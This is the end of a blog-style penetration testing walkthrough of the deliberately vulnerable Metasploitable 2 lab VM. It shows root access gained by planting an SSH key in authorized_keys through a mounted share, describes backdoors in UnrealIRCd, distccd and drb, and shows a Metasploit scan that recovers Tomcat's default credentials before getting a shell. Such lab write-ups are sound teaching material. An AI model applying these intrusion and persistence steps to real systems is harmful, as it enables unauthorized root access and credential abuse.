</span><span class='line'><span class="o">&mdash;&gt;</span><span class="n">copying</span> <span class="n">our</span> <span class="n">ssh</span> <span class="n">to</span> <span class="n">the</span> <span class="n">remote</span> <span class="n">root</span> <span class="n">folder</span> <span class="n">through</span> <span class="n">mount</span> <span class="n">share</span>
</span><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># cat ~/.ssh/id_rsa.pub &gt;&gt; /tmp/dsm/root/.ssh/authorized_keys</span>
</span><span class='line'>
</span><span class='line'><span class="o">&mdash;&gt;</span> <span class="no">Finally</span> <span class="no">Do</span> <span class="n">the</span> <span class="n">ssh</span>
</span><span class='line'><span class="n">root</span><span class="vi">@Hacker</span><span class="ss">:~</span><span class="c1"># ssh <a href="&#109;&#x61;&#105;&#x6c;&#116;&#x6f;&#58;&#114;&#111;&#111;&#x74;&#x40;&#x31;&#x39;&#50;&#46;&#x31;&#54;&#x38;&#x2e;&#50;&#x2e;&#55;">&#x72;&#x6f;&#111;&#116;&#x40;&#49;&#x39;&#x32;&#x2e;&#49;&#x36;&#56;&#46;&#x32;&#46;&#55;</a></span>
</span><span class='line'><span class="no">Last</span> <span class="ss">login</span><span class="p">:</span> <span class="no">Sun</span> <span class="no">Aug</span> <span class="mi">24</span> <span class="mi">22</span><span class="p">:</span><span class="mi">33</span><span class="p">:</span><span class="mi">44</span> <span class="mi">2014</span> <span class="n">from</span> <span class="p">:</span><span class="mi">0</span><span class="o">.</span><span class="mi">0</span>
</span><span class='line'><span class="no">Linux</span> <span class="n">metasploitable</span> <span class="mi">2</span><span class="o">.</span><span class="mi">6</span><span class="o">.</span><span class="mi">24</span><span class="o">-</span><span class="mi">16</span><span class="o">-</span><span class="n">server</span> <span class="c1">#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686</span>
</span><span class='line'>
</span><span class='line'><span class="no">The</span> <span class="n">programs</span> <span class="n">included</span> <span class="n">with</span> <span class="n">the</span> <span class="no">Ubuntu</span> <span class="nb">system</span> <span class="n">are</span> <span class="n">free</span> <span class="n">software</span><span class="p">;</span>
</span><span class='line'><span class="n">the</span> <span class="n">exact</span> <span class="n">distribution</span> <span class="n">terms</span> <span class="k">for</span> <span class="n">each</span> <span class="n">program</span> <span class="n">are</span> <span class="n">described</span> <span class="k">in</span> <span class="n">the</span>
</span><span class='line'><span class="n">individual</span> <span class="n">files</span> <span class="k">in</span> <span class="sr">/usr/s</span><span class="n">hare</span><span class="o">/</span><span class="n">doc</span><span class="o">/</em>/</span><span class="n">copyright</span><span class="o">.</span>
</span><span class='line'>
</span><span class='line'><span class="no">Ubuntu</span> <span class="n">comes</span> <span class="n">with</span> <span class="no">ABSOLUTELY</span> <span class="no">NO</span> <span class="no">WARRANTY</span><span class="p">,</span> <span class="n">to</span> <span class="n">the</span> <span class="n">extent</span> <span class="n">permitted</span> <span class="n">by</span>
</span><span class='line'><span class="n">applicable</span> <span class="n">law</span><span class="o">.</span>
</span><span class='line'>
</span><span class='line'><span class="no">To</span> <span class="n">access</span> <span class="n">official</span> <span class="no">Ubuntu</span> <span class="n">documentation</span><span class="p">,</span> <span class="n">please</span> <span class="ss">visit</span><span class="p">:</span>
</span><span class='line'><span class="ss">http</span><span class="p">:</span><span class="sr">//</span><span class="n">help</span><span class="o">.</span><span class="n">ubuntu</span><span class="o">.</span><span class="n">com</span><span class="o">/</span>
</span><span class='line'><span class="no">You</span> <span class="n">have</span> <span class="kp">new</span> <span class="n">mail</span><span class="o">.</span>
</span><span class='line'><span class="n">root</span><span class="vi">@metasploitable</span><span class="ss">:~</span><span class="c1"># id;uname -a;</span>
</span><span class='line'><span class="n">uid</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="n">gid</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span> <span class="n">groups</span><span class="o">=</span><span class="mi">0</span><span class="p">(</span><span class="n">root</span><span class="p">)</span>
</span><span class='line'><span class="no">Linux</span> <span class="n">metasploitable</span> <span class="mi">2</span><span class="o">.</span><span class="mi">6</span><span class="o">.</span><span class="mi">24</span><span class="o">-</span><span class="mi">16</span><span class="o">-</span><span class="n">server</span> <span class="c1">#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux</span>
</span><span class='line'><span class="n">root</span><span class="vi">@metasploitable</span><span class="ss">:~</span><span class="c1"># </span>
</span></code></pre></td></tr></table></div></figure></p>

<h2>Backdoors</h2>

<h4>UnrealIRCD Backdoor</h4>

<p><p>The remote machine was running a UnreaIRCD IRC daemon. Later we found that this version contains a backdoor that can be triggered
by sending the letters &ldquo;AB&rdquo; following by a system command to the server on any listening port.<p/>
<p>Metasploit has a module to exploit this in order to gain an interactive shell, as shown below.<p/></p>

<p><img src="http://i.imgur.com/sJXmibS.png"></p>

<h2>Backdoor by Nature</h2>

<p><p>Distccd is a free distributed c/c++ compiler runs on port <code>3632</code>, which was found to be vunerable for a backoor.
The problem with this service is that any user can easily abuse it to run a command of their choice to gain a interactive shell.
We achieved a interactive shell via the metasploit module, as shown below<p/></p>

<p><img src="http://i.imgur.com/svGBRIE.png"></p>

<h2>Remote Code execution</h2>

<p><p> The <code>drb</code> service running on port <code>8787</code> was vulnerable to  remote code execution. We exploited this vulnerability using the
metasploit module which is coded below<p/></p>

<p><img src="http://i.imgur.com/RFNiuju.png"></p>

<h2>Web Backdoor</h2>

<p><p>For a while we were exploiting the vulnerabilities only on network side, and we didnt even exploit any of the web services.
So we now decided do a web backoor and were looing for a suitable service to do so. By doing a quick scan through our human eyes into the nmap
results we found a <code>Apache tomcat</code> service running on port <code>8180</code>. The following page will appear if you browse this port with the
target ip<p /></p>

<p><img src="http://i.imgur.com/cbHaPwG.png"></p>

<p><p>Take a look at the webpage, you could see a Administration column containing:<p />
1. status
2. Tomcat administration
3. Tomcat manager</p>

<p><p>we just made a click on one of the link, suddenly a Authentication page appears saying enter the <code>UserName</code> and <code>Password</code>. when we got this
we thougt that we could not exploit the page. But its not the case, we decided to do a search in metasploit about tomcat to find any
modules for exploiting and we got a list of modules. Then we decided to run the specific auxiliary modules which would result you the
username and password of the tomcat administrator. The metasploit auxiliary module is shown below.<p/></p>

<p><figure class='code'><figcaption><span>Tomcat Auxiliary scan </span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">auxiliary</span><span class="o">/</span><span class="n">admin</span><span class="o">/</span><span class="n">http</span><span class="o">/</span><span class="n">tomcat_administration</span>
</span></code></pre></td></tr></table></div></figure>
<p>After a while the scan was complete and we got the username and passowrd for tomcat administration whihc is shown below<p/>
<figure class='code'><figcaption><span>Tomcat_administration</span></figcaption><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
</pre></td><td class='code'><pre><code class='ruby'><span class='line'><span class="n">msf</span> <span class="o">&gt;</span> <span class="n">use</span> <span class="n">auxiliary</span><span class="o">/</span><span class="n">admin</span><span class="o">/</span><span class="n">http</span><span class="o">/</span><span class="n">tomcat_administration</span>
</span><span class='line'><span class="n">msf</span> <span class="n">auxiliary</span><span class="p">(</span><span class="n">tomcat_administration</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">set</span> <span class="no">RHOSTS</span> <span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span>
</span><span class='line'><span class="no">RHOSTS</span> <span class="o">=&gt;</span> <span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span>
</span><span class='line'><span class="n">msf</span> <span class="n">auxiliary</span><span class="p">(</span><span class="n">tomcat_administration</span><span class="p">)</span> <span class="o">&gt;</span> <span class="n">run</span>
</span><span class='line'>
</span><span class='line'><span class="o">[*]</span> <span class="ss">http</span><span class="p">:</span><span class="sr">//</span><span class="mi">192</span><span class="o">.</span><span class="mi">168</span><span class="o">.</span><span class="mi">2</span><span class="o">.</span><span class="mi">7</span><span class="p">:</span><span class="mi">8180</span><span class="o">/</span><span class="n">admin</span> <span class="o">[</span><span class="no">Apache</span><span class="o">-</span><span class="no">Coyote</span><span class="o">/</span><span class="mi">1</span><span class="o">.</span><span class="mi">1</span><span class="o">]</span> <span class="o">[</span><span class="no">Apache</span> <span class="no">Tomcat</span><span class="o">/</span><span class="mi">5</span><span class="o">.</span><span class="mi">5</span><span class="o">]</span> <span class="o">[</span><span class="no">Tomcat</span> <span class="no">Server</span> <span class="no">Administration</span><span class="o">]</span> <span class="o">[</span><span class="n">tomcat</span><span class="o">/</span><span class="n">tomcat</span><span class="o">]</span>
</span></code></pre></td></tr></table></div></figure>
<p>Now we could make use of this tomcat username and password to gain a interactive shell using the below metasploit module<p/></p>

<p><img src="http://i.imgur.com/tzP9aaf.png"></p>

<p><p>Finaly we got out shell!!!!!.<p/></p>

<p><strong><em>*Game Over</em></strong></p>

<p><p> Its Time to endup this Pentesting Roadmap of Metasploitable 2. <strong><em>Game Over Guys</em></strong>. Stay tuned each weekend i will get back with
different VM&rsquo;s with different ways of Getting the Flag.<p/></p>
]]></content>
  </entry>
  
</feed>